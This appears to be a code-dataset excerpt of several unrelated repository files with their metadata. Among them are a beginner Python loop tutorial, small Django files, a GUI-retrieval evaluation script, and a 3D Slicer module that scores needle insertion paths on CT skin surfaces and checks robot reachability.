help="Whether to save all images in dirctory specified in -out --output-path and not imitate directory structure from the path specified in -indir --input-base-dir\n")
parser.add_argument("-duplicate", "--duplicate-img-faces",
action="store_true",
dest="duplicate_img_of_faces",
default=False,
help="Whether to save the original images of the extracted faces also. Only valid if -crop --crop-faces is passed as argument")
parser.add_argument("-model", "--classification-model",
type=str,
dest = "classification_model",
default="resources/model_with_1400_masked_samples.h5")
kwargs = vars(parser.parse_args())
logging.basicConfig(level=logging.INFO)
logging.info(" Preparing model...")
model = insightface.model_zoo.get_model('retinaface_r50_v1')
model.prepare(ctx_id = -1, nms=0.4)
if kwargs["keep_only_imgs_with_masked_faces"]:
logging.info(" Loading classification model...")
maskNet = tf.keras.models.load_model(kwargs["classification_model"], compile=False)
main2(kwargs)
|
[
"segaracos@outlook.com"
] |
segaracos@outlook.com
|
cef0851b730719e6ec2ecdb6c1260034484790a2
|
ce6df0cd2a21fd98d2a58793816f8be09658c73a
|
/loop.py
|
98c95cd9761441e221a66e2e76c2e57395b90e8e
|
[] |
no_license
|
MikeTheFyke/Python
|
5ee6de684a0985fb28829da16982fe039884426e
|
5fde6be8e8f1c5b90028a5dcd5f39bc149cdaca4
|
refs/heads/master
| 2021-01-05T09:00:08.564586
| 2020-03-03T21:47:05
| 2020-03-03T21:47:05
| 240,965,364
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,517
|
py
|
rockosML = [
"Rocko Rama",
"Spunky",
"Heffer Wolfe",
"Ed BigHead",
"Bev BigHead",
"Filburt Turtle",
"Earl The Dog",
"Paula Hutchison"
]
print("\n--This is the start of the list--")
# Indenting in Python can define end points for for loops.
for name in rockosML:
print name
print("---This is the end of the list---\n")
# Mass Uppercasing by using The Append method to save changed data into new Array
print("\nThe same list but all in CAPS\n")
upperNames = []
for name in rockosML:
name = name.upper()
upperNames.append(name)
print(upperNames)
print("\n ---The End Is Here--- \n")
# Directions Loop
print("\nLet's Get You Moving\n")
directions = [
"turn left",
"go straight",
"turn right",
"keep going until you see the dog statue",
"turn right",
"turn right again",
"park right on the sidewalk"
]
instructions = "First "
for nextDirection in directions:
instructions = instructions + nextDirection + ", then \n"
print(instructions + "\nYou Have Arrived :)\n")
# Bacteria Loop using the range method, 10 iterations in my example
# using time.sleep method to create a pause between iterations.
print("\nWelcome to The Bacteria Zone\n")
# imported time method
import time
bacteria = "&"
generations = 10
for generation in range(0, generations):
# bacteria = bacteria + bacteria - replaced to show strings can be mulitplied
bacteria = bacteria * 2
print(bacteria)
time.sleep(0.5)
print("\nThank You Come Again\n")
|
[
"mikefyke@hotmail.com"
] |
mikefyke@hotmail.com
|
21c08f1cc6e33c90dd171f8ca67a5a0a1ef54b06
|
4f2dd2feb3d7a62c382534a563e4d823a324e5d9
|
/src/imgUpload/views.py
|
3038919b64f4ecdd9fa25f5b24356148eed74dc9
|
[
"MIT"
] |
permissive
|
codezerro/Django-Dev-To-Development-2
|
fc727d72fea3af19e15bc42429a50e159760252b
|
5e0780d2bdd8d3c5526a7cf813b14216336ed5f2
|
refs/heads/master
| 2022-12-21T23:29:35.655252
| 2020-09-22T02:31:49
| 2020-09-22T02:31:49
| 296,371,171
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 149
|
py
|
from django.shortcuts import render
# Create your views here.
def imgCompress(request):
return render(request, 'imgupload/index.html')
|
[
"kabircp08@gmail.com"
] |
kabircp08@gmail.com
|
c4ce2e6ba48d68bd21ff577fd3d57c7571c05689
|
50e6d7c4f7c3fe5127f4cc4634d6e9acdf8f5e17
|
/evaluate_cpu_only.py
|
cb4b463f79c79755652b1a74c1effe49460c817c
|
[
"MIT"
] |
permissive
|
Tiamat-Tech/gcn-cnn
|
907500a2cd4b42a1d5e43192b1b09956db02ccbd
|
6f9c685dd9ac9567746aa1904e549ecc00a7a712
|
refs/heads/master
| 2023-03-17T17:06:54.800458
| 2021-03-09T19:30:09
| 2021-03-09T19:30:09
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 4,552
|
py
|
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""
Created on Wed Nov 20 11:01:07 2019
Compute the performance metrics for graphencoder model
performance metrics includes iou, pixelAccuracy
@author: dipu
"""
import torch
from torchvision import transforms
import torch.nn.functional as F
import pickle
from scipy.spatial.distance import cdist
import numpy as np
import init_paths
from dataloaders.dataloader_test_2 import *
from dataloaders.dataloader_test_2 import RICO_ComponentDataset
import models
import opts_dml
import os
from BoundingBox import BoundingBox
from BoundingBoxes import BoundingBoxes
from utils import mkdir_if_missing, load_checkpoint
from eval_metrics.get_overall_Classwise_IOU import get_overall_Classwise_IOU
from eval_metrics.get_overall_pix_acc import get_overall_pix_acc
def main():
opt = opts_dml.parse_opt()
os.environ["CUDA_VISIBLE_DEVICES"] = opt.gpu_id
onlyGallery = True
opt.use_directed_graph = True
opt.decoder_model = 'strided'
opt.dim =1024
boundingBoxes = getBoundingBoxes_from_info()
model_file = 'trained_models/model_dec_strided_dim1024_ep35.pth'
data_transform = transforms.Compose([ # Not used for 25Channel_images
transforms.Resize([255,127]),
transforms.ToTensor(),
transforms.Normalize([0.485, 0.456, 0.406], [0.229, 0.224, 0.225])
])
model = models.create(opt.decoder_model, opt)
#resume = load_checkpoint(model_file)
resume = torch.load(model_file, map_location=torch.device('cpu'))
model.load_state_dict(resume['state_dict'])
#model = model.cuda()
model.eval()
loader = RICO_ComponentDataset(opt, data_transform)
q_feat, q_fnames = extract_features(model, loader, split='query')
g_feat, g_fnames = extract_features(model, loader, split='gallery')
if not(onlyGallery):
t_feat, t_fnames = extract_features(model, loader, split='train')
g_feat = np.vstack((g_feat,t_feat))
g_fnames = g_fnames + t_fnames
q_feat = np.concatenate(q_feat)
g_feat = np.concatenate(g_feat)
distances = cdist(q_feat, g_feat, metric= 'euclidean')
sort_inds = np.argsort(distances)
overallMeanClassIou, _, _ = get_overall_Classwise_IOU(boundingBoxes,sort_inds,g_fnames,q_fnames, topk = [1,5,10])
overallMeanAvgPixAcc, _, _ = get_overall_pix_acc(boundingBoxes,sort_inds,g_fnames,q_fnames, topk = [1,5,10])
print('The overallMeanClassIou = ' + str([ '{:.3f}'.format(x) for x in overallMeanClassIou]) + '\n')
print('The overallMeanAvgPixAcc = ' + str([ '{:.3f}'.format(x) for x in overallMeanAvgPixAcc]) + '\n')
def extract_features(model, loader, split='gallery'):
epoch_done = False
feat = []
fnames = []
c=0
torch.set_grad_enabled(False)
while epoch_done == False:
c+=1
data = loader.get_batch(split)
sg_data = {key: torch.from_numpy(data['sg_data'][key]) for key in data['sg_data']}
x_enc, x_dec = model(sg_data)
x_enc = F.normalize(x_enc)
outputs = x_enc.detach().cpu().numpy()
feat.append(outputs)
fnames += [x['id'] for x in data['infos']]
if data['bounds']['wrapped']:
#print('Extracted features from {} images from {} split'.format(c, split))
epoch_done = True
print('Extracted features from {} images from {} split'.format(len(fnames), split))
return feat, fnames
# prepare bounding boxes information for RICO dataset
def getBoundingBoxes_from_info(info_file = 'data/rico_box_info.pkl'):
allBoundingBoxes = BoundingBoxes()
info = pickle.load(open(info_file, 'rb'))
#files = glob.glob(data_dir+ "*.json")
for imageName in info.keys():
count = info[imageName]['nComponent']
for i in range(count):
box = info[imageName]['xywh'][i]
bb = BoundingBox(
imageName,
info[imageName]['componentLabel'][i],
box[0],
box[1],
box[2],
box[3],
iconClass=info[imageName]['iconClass'],
textButtonClass=info[imageName]['textButtonClass'])
allBoundingBoxes.addBoundingBox(bb)
print('Collected {} bounding boxes from {} images'. format(allBoundingBoxes.count(), len(info) ))
# testBoundingBoxes(allBoundingBoxes)
return allBoundingBoxes
#%%
if __name__ == '__main__':
main()
|
[
"dips4717@gmail.com"
] |
dips4717@gmail.com
|
187daa4d61a1ac611a58cbcbda03db4114656f11
|
ea71a043e78c2fcbf1e9a39ff11eb39c699edd63
|
/core/views.py
|
4697547485e970b1daab5211e1a32ce427e7ff05
|
[] |
no_license
|
wellvsilva/djangoecommerce
|
fcce49c57def11480b66187ed0343a3b552f81ec
|
1bd9edcc5bd28f3a2721a489d389ef17efd343c7
|
refs/heads/master
| 2021-01-11T04:40:27.050588
| 2016-10-17T14:08:50
| 2016-10-17T14:08:50
| 71,141,786
| 1
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 307
|
py
|
from django.shortcuts import render
from django.http import HttpResponse
# Create your views here.
def index(request):
return render(request, 'index.html')
def contact(request):
return render(request, 'contact.html')
#def product_list(request):
# return render(request, 'product_list.html')
|
[
"wellvsilva.programador@gmail.com"
] |
wellvsilva.programador@gmail.com
|
a8ac5edd27c7ac2656e13272e14dc4959808b147
|
d4f7457a15472788821c31f3ffbbefc620e7984d
|
/student/migrations/0013_alter_project_upload_images.py
|
04373a559a4e521a42d067291e21dee28c0666b7
|
[] |
no_license
|
shashiprajj/Resume_master
|
9d3a48650d66b0912742676ada41810274f2b8e3
|
3acc94b0bb5dd140ea1ecc2fba2550ef71a556ef
|
refs/heads/master
| 2023-07-02T15:14:18.578101
| 2021-08-07T20:21:21
| 2021-08-07T20:21:21
| 393,724,046
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 433
|
py
|
# Generated by Django 3.2.3 on 2021-05-30 16:30
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('student', '0012_alter_project_upload_images'),
]
operations = [
migrations.AlterField(
model_name='project',
name='upload_images',
field=models.FileField(blank=True, null=True, upload_to='projects'),
),
]
|
[
"shashiprajj@gmail.com"
] |
shashiprajj@gmail.com
|
2d8682112e73378bda15b48f3f96e82f212dda8b
|
96e2c852ce0ba975affacc90e31037dd3982ed4b
|
/BestPathVisualization/BestPathVisualizationLib/logic.py
|
0480871de29e0fdeecaad1423d664039cdf113d8
|
[] |
no_license
|
StefanTUHH/robotic_needle_insertion
|
9d5c3883f36ce325952e08b130bc355028ad1578
|
0b54ebcf97a0946ec3ba99cfbaef1d471482c9d5
|
refs/heads/master
| 2023-07-10T12:04:53.801630
| 2021-09-01T07:08:34
| 2021-09-01T07:08:34
| 400,170,804
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 33,514
|
py
|
import sys
from itertools import compress
from typing import Optional
from numpy import linalg
import time
from multiprocessing import Process, cpu_count, Queue
from . import overlay
from .slicer_convenience_lib import *
try:
import sklearn
from scipy.spatial import ConvexHull
except ImportError:
slicer.util.pip_install("scipy==1.5.2")
slicer.util.pip_install("sklearn")
import sklearn
from scipy.spatial import ConvexHull
try:
import pyvista as pv
except ImportError:
slicer.util.pip_install("pyvista")
import pyvista as pv
# BestPathVisualizationLogic
#
class BestPathVisualizationLogic(ScriptedLoadableModuleLogic):
"""This class should implement all the actual
computation done by your module. The interface
should be such that other python code can import
this class and make use of the functionality without
requiring an instance of the Widget.
Uses ScriptedLoadableModuleLogic base class, available at:
https://github.com/Slicer/Slicer/blob/master/Base/Python/slicer/ScriptedLoadableModule.py
"""
T0, T1, T2, T3, T4 = 0, 0, 0, 0, 0
def __init__(self, maxDistance, imageThreshold, colorbarValue, discreetStepsValue, socketReceiveSend, matrix):
self.segmentEditorNode = None
self.segmentationNode = None
self.updateCallback = None
self.doneCallback = None
self.cancel = False
self.outputPath = None
self.useHoleFilling = False
self.maxDistance = maxDistance
self.imageThreshold = imageThreshold
self.initTransform = True
self.socketReceiveSend = socketReceiveSend
self.matrix = matrix
self.colorbarValue = colorbarValue
self.discreetStepsValue = discreetStepsValue
self.arrShape = None
self.overlayTypeIndex = 0
self.maxKernelSize = 0
self.distanceWeighting = None
self.angleWeighting = None
self.gantry_pose = np.asarray(
((1., 0., 0., -1000.,), (0., 1., 0., -1000.,), (0., 0., 1., 1390.,), (0., 0., 0., 1.,)))
self.scalarData = None
self.scalarDataMoveIt = None
self.targetGlobal = [0, 0, 0]
self.targetPoint = [0, 0, 0]
def runSegment(self, inputVolume, outputModel, targetNode):
"""
Run the actual algorithm
"""
if not self.isValidInputOutputData(inputVolume, outputModel, targetNode):
return False
logging.info('Processing started')
npArrPoly = arrayFromModelPoints(outputModel)
if len(npArrPoly) == 0:
start_A = time.time()
self.segmentSkin(inputVolume, outputModel)
end_A = time.time()
self.T0 = end_A - start_A
npArrPoly = arrayFromModelPoints(outputModel)
else:
logging.info("Using previously segmented skin model")
self.initWithPreviousModel(inputVolume, outputModel)
ret = self.addOverlay(outputModel, targetNode)
if ret is None:
return False
indices, insideTransformed = ret
relevantPoints = np.asarray(self.scalarData)[indices] < self.globalMaxDensity
if len(relevantPoints) > 0 and not self.applyMaxKernel(np.asarray(indices)[relevantPoints],
insideTransformed[relevantPoints, :]):
return False
combinedArray = np.zeros((len(npArrPoly) + 1, 4), dtype=np.float)
combinedArray[0, :3] = self.targetGlobal
combinedArray[1:, :3] = npArrPoly
combinedArray[1:, 3] = self.scalarData
combinedArrayMoveIt, foundInfeasiblePosition = self.applyReachability(combinedArray, npArrPoly)
self.writeOutput(targetNode, combinedArray, combinedArrayMoveIt)
self.displayResults(combinedArrayMoveIt is not None, npArrPoly, outputModel, foundInfeasiblePosition)
logging.info('Processing completed')
if self.waypoint(100):
return False
return True
@staticmethod
def np_matrix_from_vtk(vtk_matrix):
result = np.eye(4)
for r in range(4):
for c in range(4):
result[r, c] = vtk_matrix.GetElement(r, c)
return result
def applyReachability(self, combinedArray, npArrPoly):
# Check if Points are reachable by MoveIt
combinedArrayMoveItIn = np.delete(combinedArray, 0, 0)
combinedArrayMoveIt = None
foundInfeasiblePosition = False
if self.socketReceiveSend is not None:
if self.waypoint(95, "Checking Map with MoveIt"):
return False
tf_matrix = self.np_matrix_from_vtk(self.matrix)
self.applyGantryMesh(tf_matrix)
self.applyCollisionMesh(npArrPoly)
start_E = time.time()
combinedArrayMoveIt = self.checkMoveIt(combinedArrayMoveItIn)
end_E = time.time()
self.T4 = end_E - start_E
moveItBool = combinedArrayMoveIt[:, 4]
# Create VTK Color Map
self.scalarDataMoveIt = vtk.vtkFloatArray()
self.scalarDataMoveIt.SetNumberOfComponents(0)
self.scalarDataMoveIt.SetNumberOfValues(len(npArrPoly))
self.scalarDataMoveIt.SetName("density")
toAdd = int(np.ceil((self.colorbarValue - self.globalMinDensity) / 256))
not_reachable = moveItBool == 1
np.asarray(self.scalarDataMoveIt)[~not_reachable] = combinedArray[
np.add(np.where(~not_reachable), 1), 3].flatten()
if np.any(not_reachable):
foundInfeasiblePosition = True
np.asarray(self.scalarDataMoveIt)[not_reachable] = self.globalMaxDensity + toAdd
logging.info("Finished with MoveIT")
return combinedArrayMoveIt, foundInfeasiblePosition
def writeOutput(self, targetNode, combinedArray, combinedArrayMoveIt: Optional = None):
if self.outputPath is not None and self.outputPath is not '':
string_path = self.outputPath.split('.')
targetName = targetNode.GetName()
outputPath_ColormapMoveIt = string_path[0] + targetName + '_Rob.txt'
outputPath_Colormap = string_path[0] + targetName + '.txt'
outputPath_ComputationTime = string_path[0] + targetName + '_ComputationTime.txt'
timeEstimation = "time" in outputPath_Colormap
logging.info("Saving result to file {}".format(outputPath_Colormap))
with open(outputPath_Colormap, "w") as f:
np.savetxt(f, combinedArray)
if timeEstimation:
logging.info("Saving Computation Time.")
with open(outputPath_ComputationTime, "w") as f:
np.savetxt(f, [self.T0, self.T1, self.T2, self.T3, self.T4])
if combinedArrayMoveIt is not None:
logging.info("Saving moveit result to file {}".format(outputPath_ColormapMoveIt))
with open(outputPath_ColormapMoveIt, "w") as f:
np.savetxt(f, combinedArrayMoveIt)
def displayResults(self, couldConnectToMoveIt, npArrPoly, outputModel, foundInfeasiblePosition):
if couldConnectToMoveIt:
min_point = npArrPoly[np.argmin(self.scalarDataMoveIt), :]
else:
min_point = npArrPoly[np.argmin(self.scalarData), :]
fixedLRS = slicer.vtkMRMLMarkupsFiducialNode()
fixedLRS.SetName('Opt_Surface')
fixedLRS.AddFiducial(min_point[0], min_point[1], min_point[2])
slicer.mrmlScene.AddNode(fixedLRS)
fixedLRS.SetDisplayVisibility(True)
outputModel.CreateDefaultDisplayNodes()
print("Showing resulting model")
if couldConnectToMoveIt:
outputModel.GetPolyData().GetPointData().AddArray(self.scalarDataMoveIt)
else:
outputModel.GetPolyData().GetPointData().AddArray(self.scalarData)
arrayFromModelPointDataModified(outputModel, "density")
arrayFromModelPointsModified(outputModel)
# Show pretty results
modelDisplayNode = outputModel.GetDisplayNode()
modelDisplayNode.SetActiveScalarName("density")
modelDisplayNode.SetScalarRangeFlag(1)
scalarRange = modelDisplayNode.GetScalarRange()
# Fixes issue when no point is reachable
scalarRange = (min(self.colorbarValue - 1, min(scalarRange[0], np.min(self.scalarData))),
max(scalarRange[1], np.max(self.scalarData)))
newColorSize = int(
round((scalarRange[1] - self.colorbarValue) / (self.colorbarValue - scalarRange[0]) * 256 + 256))
densityColor = slicer.mrmlScene.AddNode(slicer.modules.colors.logic().CopyNode(
slicer.mrmlScene.GetNodeByID("vtkMRMLColorTableNodeFileColdToHotRainbow.txt"), "densityColor"))
densityColor.SetNumberOfColors(int(newColorSize))
offset = 10
for i in range(256, newColorSize - offset):
densityColor.SetColor(i, 0.453125, 0, 0)
for i in range(newColorSize - offset, newColorSize - 1):
densityColor.SetColor(i, 0.875, 0.671875, 0.41015625)
if couldConnectToMoveIt and foundInfeasiblePosition:
densityColor.SetColor(newColorSize - 1, 0.35, 0.35, 0.35)
else:
densityColor.SetColor(newColorSize - 1, 0.875, 0.671875, 0.41015625)
modelDisplayNode.SetAndObserveColorNodeID(densityColor.GetID())
print("Displaying...")
modelDisplayNode.SetScalarVisibility(True)
modelDisplayNode.SetScalarRangeFlag(0)
modelDisplayNode.SetScalarRange((scalarRange[0], scalarRange[1]))
def addOverlay(self, outputModel, targetNode):
targetNode.GetMarkupPoint(0, 0, self.targetGlobal)
self.targetPoint = self.transformToCT(self.targetGlobal)
logging.info("Surface point in CT indices: {}".format(self.targetPoint))
npArrPoly = arrayFromModelPoints(outputModel)
if self.waypoint(25, "Adding scalar overlay"):
return None
self.scalarData = vtk.vtkFloatArray()
self.scalarData.SetNumberOfComponents(0)
self.scalarData.SetNumberOfValues(len(npArrPoly))
self.scalarData.SetName("density")
# Calc density for all relevant surface points
point_VolumeRas = vtk.vtkPoints()
transformed = self.transformPointsToCT(outputModel.GetPolyData().GetPoints(), point_VolumeRas)
distances = np.linalg.norm(npArrPoly - self.targetGlobal, axis=1)
pointOutside = np.add(np.add(distances > self.maxDistance, ~self.pointInVolume(transformed, self.arrShape)),
npArrPoly[:, 1] < 50 + np.min(npArrPoly[:, 1]))
pointInside = ~pointOutside
np.asarray(self.scalarData)[pointOutside] = self.globalMaxDensity
indices = list(compress(range(len(pointInside)), pointInside))
insideTransformed = np.asarray(list(compress(transformed, pointInside)))
self.maxIdx = len(indices) - 1
logging.info(self.maxIdx)
with np.errstate(divide='ignore', invalid='ignore'):
if self.overlayTypeIndex == 7:
start_B = time.time()
self.overlayTypeIndex = 0
if not calcDensityInThread(self, indices, insideTransformed):
return None
if self.waypoint(40):
return None
combinedData = np.copy(self.scalarData)
relevant_indices = np.logical_and(combinedData < self.colorbarValue, pointInside)
end_B = time.time()
self.T1 = end_B - start_B
if self.distanceWeighting > 0:
self.overlayTypeIndex = 4 # Distance
start_C = time.time()
if not calcDensityInThread(self, indices, insideTransformed):
return None
if self.waypoint(60):
return None
maxDistance = self.maxDistance
np.asarray(self.scalarData)[relevant_indices] = np.asarray(self.scalarData)[
relevant_indices] / maxDistance * self.colorbarValue
combinedData[relevant_indices] = self.distanceWeighting * np.asarray(self.scalarData)[
relevant_indices]
end_C = time.time()
self.T2 = end_C - start_C
else:
combinedData[relevant_indices] = 0
if self.angleWeighting > 0:
start_D = time.time()
self.overlayTypeIndex = 5 # Angle
if not calcDensityInThread(self, indices, insideTransformed):
return None
maxAngle = np.pi / 2
np.asarray(self.scalarData)[relevant_indices] = np.asarray(self.scalarData)[
relevant_indices] / maxAngle * self.colorbarValue
combinedData[relevant_indices] = combinedData[relevant_indices] + self.angleWeighting * \
np.asarray(self.scalarData)[relevant_indices]
end_D = time.time()
self.T3 = end_D - start_D
np.asarray(self.scalarData)[:] = combinedData
self.overlayTypeIndex = 7
else:
if not calcDensityInThread(self, indices, insideTransformed):
return None
return indices, insideTransformed
def initWithPreviousModel(self, inputVolume, outputModel):
if self.arrShape is None:
self.transformRasToVolumeRas = vtk.vtkGeneralTransform()
slicer.vtkMRMLTransformNode.GetTransformBetweenNodes(None, inputVolume.GetParentTransformNode(),
self.transformRasToVolumeRas)
# Get voxel coordinates from physical coordinates
volumeRasToIjk = vtk.vtkMatrix4x4()
inputVolume.GetRASToIJKMatrix(volumeRasToIjk)
self.volumeRasToIjk = vtk.vtkTransform()
self.volumeRasToIjk.SetMatrix(volumeRasToIjk)
self.inputVolumeNPArray = np.asarray(slicer.util.arrayFromVolume(inputVolume))
self.globalMaxDensity = np.max(self.inputVolumeNPArray) + 10
self.globalMinDensity = np.min(self.inputVolumeNPArray)
self.arrShape = np.asarray(np.shape(self.inputVolumeNPArray))
self.spacing = inputVolume.GetSpacing()
logging.info("Shape: " + str(self.arrShape))
self.result = np.zeros(self.arrShape) + self.globalMaxDensity
outputModel.GetPolyData().GetPointData().RemoveArray("density")
def segmentSkin(self, inputVolume, outputModel):
# If volume node is transformed, apply that transform to get volume's RAS coordinates
self.transformRasToVolumeRas = vtk.vtkGeneralTransform()
slicer.vtkMRMLTransformNode.GetTransformBetweenNodes(None, inputVolume.GetParentTransformNode(),
self.transformRasToVolumeRas)
# Get voxel coordinates from physical coordinates
volumeRasToIjk = vtk.vtkMatrix4x4()
inputVolume.GetRASToIJKMatrix(volumeRasToIjk)
self.spacing = inputVolume.GetSpacing()
self.volumeRasToIjk = vtk.vtkTransform()
self.volumeRasToIjk.SetMatrix(volumeRasToIjk)
self.inputVolumeNPArray = np.asarray(slicer.util.arrayFromVolume(inputVolume))
self.globalMaxDensity = np.max(self.inputVolumeNPArray) + 10
self.globalMinDensity = np.min(self.inputVolumeNPArray)
self.arrShape = np.asarray(np.shape(self.inputVolumeNPArray))
logging.info("Shape: " + str(self.arrShape))
self.result = np.zeros(self.arrShape) + self.globalMaxDensity
if self.waypoint(5, "Creating segmentation"):
return False
# Create segmentation
if self.segmentationNode is not None:
slicer.mrmlScene.RemoveNode(self.segmentationNode)
addedSegmentID, segmentEditorWidget, segmentEditorNode = self.initSegmentationNode(inputVolume)
self.applyThresholding(segmentEditorWidget, inputVolume)
if self.waypoint(10, "Selecting largest island"):
return False
self.applyLargestIsland(segmentEditorWidget)
if self.useHoleFilling:
if self.waypoint(12, "Filling holes"):
return False
self.applySmoothing(segmentEditorWidget)
if self.waypoint(18, "Inverting"):
return False
self.applyInverting(segmentEditorWidget)
if self.waypoint(19, "Selecting largest island"):
return False
# Selecting largest island
self.applyLargestIsland(segmentEditorWidget)
if self.waypoint(20, "Inverting"):
return False
self.applyInverting(segmentEditorWidget)
# Cleanup
segmentEditorWidget.setActiveEffectByName(None)
slicer.mrmlScene.RemoveNode(segmentEditorNode)
if self.waypoint(21, "Creating closed surface"):
return False
outputPolyData = vtk.vtkPolyData()
slicer.vtkSlicerSegmentationsModuleLogic.GetSegmentClosedSurfaceRepresentation(self.segmentationNode,
addedSegmentID, outputPolyData)
outputModel.SetAndObservePolyData(outputPolyData)
self.segmentationNode.GetDisplayNode().SetVisibility(False)
def checkMoveIt(self, modelPoints):
# Split Array
positions = modelPoints[:, :3]
color = modelPoints[:, 3]
# Only eval Points which have a feasible color
relevantColor = color < self.globalMaxDensity
positions_color = positions[relevantColor, :]
# Round Positions
positions_color_r = np.ceil(positions_color / self.discreetStepsValue) * self.discreetStepsValue
# Find unique Positions
positions_color_r_unique = np.unique(positions_color_r, axis=0)
transformedPoints = self.transformToBase(
np.append(np.expand_dims(self.targetGlobal, axis=0), positions_color_r_unique, axis=0))
sendArray = np.append(np.array([len(positions_color_r_unique)]), transformedPoints.flatten())
target_transformed = transformedPoints[0, :3]
self.waypoint(96, 'Starting Checking Points with MoveIt')
# print(sendArray)
print('Points to evaluate:' + str(len(positions_color_r_unique)))
# Convert to Float
moveIt_result = self.sendInPeices(positions_color_r_unique, sendArray, target_transformed)
# print("moveIt_result_boolean", moveIt_result)
moveIt_result_idx = np.ones(len(moveIt_result))
if np.any(np.asarray(moveIt_result)):
moveIt_result_idx[np.asarray(moveIt_result)] = 2
# 0 --> not in map, 1--> in colormap but not reachabel, 2--> in colormap and reachable
self.waypoint(99, 'Finished Checking Points with MoveIt')
# Update Color List
color_array_moveIT = np.zeros(len(positions_color_r))
for count, p in enumerate(positions_color_r_unique):
color_array_moveIT[np.all(positions_color_r == p, axis=1)] = moveIt_result_idx[count]
modelPointsOut = np.zeros((len(positions), 5), dtype=np.float)
modelPointsOut[:, :3] = positions
modelPointsOut[:, 3] = color
modelPointsOut[relevantColor, 4] = color_array_moveIT
return modelPointsOut
def sendInPeices(self, positions_color_r_unique, sendArray, target_transformed):
sent = 0
socketsForSimulation = self.socketReceiveSend if len(self.socketReceiveSend) <= 1 else self.socketReceiveSend[1:]
per_package = int(np.ceil(len(positions_color_r_unique) / len(socketsForSimulation)))
for s in socketsForSimulation:
if len(positions_color_r_unique) <= sent:
break
up_idx = min(sent + per_package, len(positions_color_r_unique))
to_send = np.append(np.asarray((up_idx - sent)), target_transformed[:3])
to_send = np.append(to_send, sendArray[(4 + sent * 3):(up_idx * 3 + 4)])
sent = up_idx
s.send(str(to_send.tolist()).encode())
# Receive Answer
moveIt_result = []
sent = 0
for s in socketsForSimulation:
if len(positions_color_r_unique) <= sent:
break
up_idx = min(sent + per_package, len(positions_color_r_unique))
sent = up_idx
recv_data = s.recv(102400)
msg = list(recv_data.decode('utf-8'))
moveIt_result += [bool(int(i)) for i in msg]
return moveIt_result
def applyMaxKernel(self, indices, pointsTransformed):
if self.maxKernelSize == 0:
return True
self.waypoint(75., "Applying max kernel")
from sklearn.neighbors import radius_neighbors_graph
values = np.copy(self.scalarData)
values = values[indices]
neighbours = radius_neighbors_graph(pointsTransformed * self.spacing, radius=self.maxKernelSize, n_jobs=-1,
include_self=True)
executeInPeices(lambda q, idx, sent: self.applyMaxKernelImpl(q, idx, neighbours, values, sent), indices, np.asarray(self.scalarData))
if self.waypoint(95.):
return False
return True
@staticmethod
def applyMaxKernelImpl(q: Queue, indices, neighbours, values, idxOffset):
result = np.zeros((len(indices)))
for neighbourIdx, idx in enumerate(indices):
finalIdx = np.asarray(neighbours.getrow(neighbourIdx + idxOffset).toarray(), dtype=np.bool).flatten()
result[neighbourIdx] = np.max(values[finalIdx])
q.put(result)
def pointInVolume(self, point, maxDim):
return np.logical_and(np.all(point > 0, axis=1), np.all(point < maxDim - 1, axis=1))
def transformToCT(self, point):
point_VolumeRas = self.transformRasToVolumeRas.TransformPoint(point[0:3])
point_Ijk = self.volumeRasToIjk.TransformPoint(point_VolumeRas)
return np.asarray(np.flip(point_Ijk[0:3], 0), dtype=np.int)
def transformPointsToCT(self, points, point_VolumeRas):
tmp = vtk.vtkPoints()
self.transformRasToVolumeRas.TransformPoints(points, tmp)
self.volumeRasToIjk.TransformPoints(tmp, point_VolumeRas)
return np.asarray(np.flip(vtk.util.numpy_support.vtk_to_numpy(point_VolumeRas.GetData())[:, 0:3], 1),
dtype=np.int)
def applyGantryMesh(self, tf_matrix: np.ndarray):
IJK_T_RAS = np.eye(4)
transformed_pose = tf_matrix.dot(IJK_T_RAS).dot(self.gantry_pose)
size = 3000.
points = np.asarray(((0., 0., 0., 1.), (0., size, 0., 1.), (size, 0., 0., 1.), (size, 0., 0., 1.),
(0., size, 0., 1.), (size, size, 0., 1.))).T
points = transformed_pose.dot(points)[:3, :]
max_v = np.max(points, axis=1)
min_v = np.min(points, axis=1)
center = (max_v - min_v) / 2 + min_v
points = np.subtract(points.T, center)
sendArray = np.append(np.append(np.asarray((-2., 1.)), center), points.flatten())
for s in self.socketReceiveSend:
s.send(str(sendArray.tolist()).encode())
# Wait for bb to be applied
for s in self.socketReceiveSend:
s.recv(102400)
def transformPoints(self, points, matrix):
transformed = matrix.dot(np.append(points, np.ones((np.shape(points)[0], 1)), axis=1).T)
return transformed[:3, :].T
def transformToBase(self, points):
tf_mat = self.np_matrix_from_vtk(self.matrix)
IJK_T_RAS = np.eye(4)
IJK_T_RAS[0, 0] = -1
IJK_T_RAS[1, 1] = -1
tf_mat = tf_mat.dot(IJK_T_RAS)
return self.transformPoints(points, tf_mat)
def applyCollisionMesh(self, points: np.ndarray):
resolution = 30.
# Round Positions
positions_to_eval_subsampled = np.round(points / resolution) * resolution
# Find unique Positions
unique_points_eval = np.unique(positions_to_eval_subsampled, axis=0)
if len(unique_points_eval) == 0:
return
points_arr = self.transformToBase(unique_points_eval)
cloud = pv.PolyData(points_arr[:, :3])
# cloud.plot()
volume = cloud.delaunay_3d(alpha=resolution * 1.2)
shell = volume.extract_geometry()
# shell.plot()
# Hull
# hull = ConvexHull(points_arr[:, :3])
indices = shell.faces.reshape((-1, 4))[:, 1:]
vertices = points_arr[indices]
# add table
max_v = np.max(np.max(vertices, axis=0), axis=0)
min_v = np.min(np.min(vertices, axis=0), axis=0)
table_slack = 30.
depth = 500.
min_v[2] += table_slack
min_v[:2] -= table_slack
max_v[:2] += table_slack
table = np.asarray(
(((min_v[0], min_v[1], min_v[2]), (min_v[0], max_v[1], min_v[2]), (max_v[0], max_v[1], min_v[2])),
((min_v[0], min_v[1], min_v[2]), (max_v[0], max_v[1], min_v[2]), (max_v[0], min_v[1], min_v[2])),
((min_v[0], min_v[1], min_v[2] - depth), (min_v[0], max_v[1], min_v[2] - depth),
(max_v[0], max_v[1], min_v[2] - depth)),
